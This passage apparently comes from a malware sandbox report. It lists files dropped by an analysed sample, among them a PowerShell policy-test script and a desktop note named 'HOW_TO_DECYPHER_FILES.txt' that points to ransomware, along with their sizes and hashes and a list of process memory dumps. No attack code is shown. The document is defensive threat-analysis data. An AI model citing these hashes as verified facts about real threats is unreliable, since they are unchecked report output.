6b837a896a3008be212e7a3e297859b06b1d22af

SHA256
066845e6408685e957268c1c1bbb2240809c5b5751ae7973235490032eb51d81

SHA512
804d493bfafbe4be906dc9bb760839af0dc1e7ff4e15cec1b75c328b982f797ee5910e045d691138bbf8e5bcaba3fcfe354523acd90be3a6180cdae14af19029

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c40a4212f7879c8fe4c21ad756d904b5

SHA1
b58ead9d6286a4408d555dc044bf27631188caa4

SHA256
56d060d715f335a47fd950c2492cc358a178b2123f5d34f87dd279e82669352a

SHA512
85c8e0a5444a2468ae04c9cc22c54362e7cb64b19879a2f620f76af72b0f9c2d1af9383b1549def92addfecf10686563410c96c5bf5ec4e1690b71cdcd1f971c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jrazuuph.im3.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Filesize
829B

MD5
7298cf5272c2f1468d281152ab8a9c22

SHA1
951f8c9a885b89f2c6f4a08ce0b2a1189a641a48

SHA256
f85b0d0277ef8841d05cf5f8d72303984ccfcb48e78b98e629155c9a7a4eb007

SHA512
97e9bd5c5ff31797a2c7e0c2b72fd79367abb9f44e99e4a350c827f659eef349ca77e386538e00b56a2adaf38be0190b421985179101b3560aef773b1e92a2c1

Download Submit
memory/3016-199-0x00007FFD2F650000-0x00007FFD3003C000-memory.dmp

Filesize
9.9MB

Download
memory/3016-0-0x00007FFD2F653000-0x00007FFD2F654000-memory.dmp

Filesize
4KB

Download
memory/3016-162-0x00007FFD2F653000-0x00007FFD2F654000-memory.dmp

Filesize
4KB

Download
memory/3016-3-0x00007FFD2F650000-0x00007FFD3003C000-memory.dmp

Filesize
9.9MB

Download
memory/3016-1-0x00000000006B0000-0x00000000006CA000-memory.dmp

Filesize
104KB

Download
memory/3016-1359-0x00007FFD2F650000-0x00007FFD3003C000-memory.dmp

Filesize
9.9MB

Download
memory/3420-19-0x00000227C1800000-0x00000227C1876000-memory.dmp

Filesize
472KB

Download
memory/3420-14-0x00000227C1530000-0x00000227C1552000-memory.dmp

Filesize
136KB

Download

Resubmissions

Analysis